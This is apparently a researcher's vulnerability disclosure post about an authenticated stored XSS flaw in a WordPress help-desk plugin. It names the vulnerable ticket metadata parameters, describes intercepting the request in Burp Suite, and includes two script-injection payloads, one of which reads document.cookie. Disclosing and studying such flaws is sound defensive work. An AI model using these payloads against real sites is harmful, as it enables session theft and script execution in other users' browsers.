Post

WordPress Advanced Ticket System < 1.0.64 — Authenticated Stored XSS in Ticket Metadata

Posted
By Tri Wanda Septian
1 min read
WordPress Advanced Ticket System < 1.0.64 — Authenticated Stored XSS in Ticket Metadata

Introduction

While reviewing help-desk and ticketing plugins for WordPress, I focused on how user-supplied ticket metadata is validated before being stored and rendered. These flows often accept multiple categorical fields that feel “safe” (type, priority, status), but if they are saved and later echoed without proper escaping, they become reliable vectors for stored cross-site scripting (XSS). My goal was to trace the submission lifecycle for these fields, confirm how the values are handled server-side, and validate the impact using a controlled proof-of-concept.

Summary of the Finding

The plugin fails to adequately sanitize and escape several ticket form fields before persisting and rendering them. As a result, an authenticated user with ticket-creation capability can inject script payloads into metadata fields (e.g., ticket type, priority, status). When the ticket is later viewed via its permalink, the payload executes in the viewer’s browser, constituting an authenticated stored XSS condition in versions prior to 1.0.64.

Reproduction steps (tested on local instance)

Performed only on a local test instance for verification and learning.

  • From the WordPress dashboard, go to Tickets → Add New, complete the title, content, and the metadata fields (Ticket type, Ticket priority, Ticket status), then save.
  • Intercept the resulting request in Burp Suite and locate the parameters wats_select_ticket_type, wats_select_ticket_priority, and wats_select_ticket_status. These fields are susceptible to stored XSS and can be populated with payloads such as
1

test"><script>alert('test')</script>

or

1

test"><script>alert(document.cookie)</script>

Forward the modified request. To confirm execution, open the ticket’s permalink; the injected script will run when the page renders.

All of the parameters on the “Editing Form” are vulnerable.To trigger the XSS payload, refresh the “Editing Form” page.

Timelines

  • Publicly Published : 2021-08-16
  • Added : 2021-08-16
  • Last Updated : 2021-08-16
Infosec, CVE, Research
cve infosec
This post is licensed under CC BY 4.0 by the author.